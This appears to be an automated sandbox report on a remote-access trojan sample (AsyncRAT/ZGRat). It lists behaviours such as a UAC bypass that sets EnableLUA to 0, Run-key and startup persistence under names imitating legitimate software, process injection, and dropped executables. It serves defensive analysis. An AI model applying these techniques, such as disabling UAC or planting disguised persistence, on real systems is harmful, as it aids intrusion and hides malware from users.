Malware Analysis Report

2025-08-10 19:33

Sample ID 231115-mtjpaahb4v
Target resources.exe
SHA256 f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Tags
asyncrat zgrat operacert windefault evasion persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

Threat Level: Known bad

The file resources.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat zgrat operacert windefault evasion persistence rat trojan

AsyncRat

UAC bypass

ZGRat

Detect ZGRat V1

Async RAT payload

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Drops startup file

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious use of FindShellTrayWindow

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Enumerates system info in registry

Modifies registry key

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Opens file in notepad (likely ransom note)

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-15 10:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-15 10:45

Reported

2023-11-15 10:57

Platform

win10v2004-20231025-en

Max time kernel

527s

Max time network

746s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunNihaiersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunNihaiersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunihaiVersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Music\RunNihaiersion.exe N/A
N/A N/A C:\Users\Public\Music\israil.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Public\Music\israil2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2WinDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OperaCrt.exe N/A
N/A N/A C:\Users\Public\Music\RunNihaiersion.exe N/A
N/A N/A C:\Users\Public\Music\israil.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
N/A N/A C:\Users\Public\Music\RunihaiVersion.exe N/A
N/A N/A C:\Users\Public\Music\israil2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2WinDefault.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OperaCrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioCert = "C:\\Users\\Admin\\AppData\\Roaming\\VisualStudioCert\\VisualStudioCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification \??\c:\users\public\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification \??\c:\users\public\music\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification \??\c:\users\public\downloads\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification \??\c:\users\admin\downloads\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification \??\c:\users\admin\desktop\desktop.ini C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5532 set thread context of 5628 N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5312 set thread context of 4908 N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5404 set thread context of 2748 N/A C:\Users\Admin\AppData\Roaming\OperaCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5284 set thread context of 5460 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4908 set thread context of 4824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5688 set thread context of 3496 N/A C:\Users\Admin\AppData\Roaming\WiDefault.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5260 set thread context of 5556 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4240 set thread context of 1084 N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4424 set thread context of 5336 N/A C:\Users\Admin\AppData\Roaming\OperaCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4908 set thread context of 2192 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1084 set thread context of 5768 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2560 set thread context of 4336 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 756 set thread context of 3884 N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133445190141227845" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\resources.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\resources.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
